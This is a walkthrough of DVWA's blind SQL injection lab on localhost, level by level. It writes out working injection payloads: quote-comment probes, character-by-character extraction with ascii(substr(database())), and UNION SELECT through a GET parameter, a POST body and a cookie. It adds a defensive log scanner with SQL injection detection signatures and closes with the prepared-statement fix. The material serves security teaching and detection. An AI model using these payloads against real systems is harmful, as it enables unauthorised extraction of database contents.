1. Low level (Low.php)
Submit the id with a single quote appended:
http://localhost/DVWA-master/vulnerabilities/sqli_blind/?id=1'&Submit=Submit#
The page reports that the user ID was not found. Reproducing the candidate queries against the database directly:
select first_name from users where user_id=1;          # success, returns admin
select first_name from users where user_id="1'";       # success, returns admin
select first_name from users where user_id='1'';       # fails
select first_name from users where user_id=(1');       # fails
select first_name from users where user_id=((1'));     # fails
select first_name from users where user_id=(('1''));   # fails
This shows the value is not enclosed in double quotes (had it been, the trailing quote would have been harmless and the lookup would still have succeeded); a further try shows it is enclosed in single quotes, since commenting out the rest of the query restores the normal page:
http://localhost/DVWA-master/vulnerabilities/sqli_blind/?id=1'%23&Submit=Submit#
Construct the following injection: if the first character of the database name is 'd', i.e. ASCII code 100, the page renders normally:
http://localhost/DVWA-master/vulnerabilities/sqli_blind/?id=1' and ascii(substr(database(),1,1))=100%23&Submit=Submit#
Otherwise the page does not render normally:
http://localhost/DVWA-master/vulnerabilities/sqli_blind/?id=1' and ascii(substr(database(),1,1))=99%23&Submit=Submit#
2. Medium level (Medium.php)
The id is now submitted via POST:
id=0 union select 1,2#&Submit=Submit
The page still reports that the user exists, even though id=0 does not exist: the UNION SELECT returns a row, and the program only checks whether the result set is empty.
As in the Low level, the characters are then guessed one by one:
id=1 and ascii(substr(database(),1,1))=100#&Submit=Submit
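As an added defender-side example (not part of the original walkthrough), the Python script below scans constructed Apache-style access-log lines for the probe shapes used in the Low and Medium sections and flags clients whose true/false probes drew responses of different sizes, which is the oracle blind injection depends on. It assumes the payloads arrive in the query string; POST bodies (Medium) and cookies (High) never reach the access log, so those need application-level logging.

```python
import re
from urllib.parse import unquote_plus

# Constructed log lines (not from the original page). The query strings replay
# the walkthrough's Low-level probes plus the Medium UNION payload sent as GET;
# the first line is benign traffic for contrast.
SAMPLE_LOG = """\
127.0.0.1 - - [01/Jan/2024:10:00:00 +0000] "GET /DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit HTTP/1.1" 200 512
127.0.0.1 - - [01/Jan/2024:10:00:01 +0000] "GET /DVWA-master/vulnerabilities/sqli_blind/?id=1%27%23&Submit=Submit HTTP/1.1" 200 512
127.0.0.1 - - [01/Jan/2024:10:00:02 +0000] "GET /DVWA-master/vulnerabilities/sqli_blind/?id=1%27%20and%20ascii(substr(database(),1,1))=100%23&Submit=Submit HTTP/1.1" 200 512
127.0.0.1 - - [01/Jan/2024:10:00:03 +0000] "GET /DVWA-master/vulnerabilities/sqli_blind/?id=1%27%20and%20ascii(substr(database(),1,1))=99%23&Submit=Submit HTTP/1.1" 200 498
127.0.0.1 - - [01/Jan/2024:10:00:04 +0000] "GET /DVWA-master/vulnerabilities/sqli_blind/?id=0%20union%20select%201,2%23&Submit=Submit HTTP/1.1" 200 512
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" '
                    r'(?P<status>\d{3}) (?P<size>\d+)')

# Signatures for the three payload shapes the walkthrough uses.
SQLI_PATTERNS = [
    ("comment after quote", re.compile(r"'\s*(#|--)")),
    ("char-by-char extraction", re.compile(r"\b(ascii|ord)\s*\(\s*(substr|substring|mid)\s*\(", re.I)),
    ("union select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
]

def classify(line):
    """Parse one log line; return the signatures its URL-decoded query string hits."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group("path")
    query = unquote_plus(path.split("?", 1)[1]) if "?" in path else ""
    return {"ip": m.group("ip"), "query": query, "size": int(m.group("size")),
            "hits": [name for name, rx in SQLI_PATTERNS if rx.search(query)]}

def scan(log_text):
    """All parsed lines whose query string matched at least one signature."""
    return [r for r in map(classify, log_text.splitlines()) if r and r["hits"]]

def blind_oracle_ips(results):
    """IPs whose extraction probes drew responses of differing sizes: the
    true/false oracle the blind technique relies on, even though every status is 200."""
    sizes = {}
    for r in results:
        if "char-by-char extraction" in r["hits"]:
            sizes.setdefault(r["ip"], set()).add(r["size"])
    return sorted(ip for ip, s in sizes.items() if len(s) > 1)

if __name__ == "__main__":
    for r in scan(SAMPLE_LOG):
        print(r["ip"], r["hits"], r["query"])
    print("boolean oracle observed from:", blind_oracle_ips(scan(SAMPLE_LOG)))
```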
3. High level (High.php)
Unlike the previous level, this time the id is written to a cookie, set on a separate page:
http://localhost/DVWA-master/vulnerabilities/sqli_blind/cookie-input.php
Then refresh:
http://localhost/DVWA-master/vulnerabilities/sqli_blind/
Use EditThisCookie to view the cookie.
The injection can be placed directly into the cookie value on this page:
0' union select 1,2#
Then refresh the page.
4. Impossible level (Impossible.php)
The source shows that, after an is_numeric check, the id is passed to a PDO prepared statement and bound as an integer, so it cannot be injected:
if( is_numeric( $id ) ) {
    // Check the database
    $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
    $data->bindParam( ':id', $id, PDO::PARAM_INT );
    $data->execute();
    // ...
}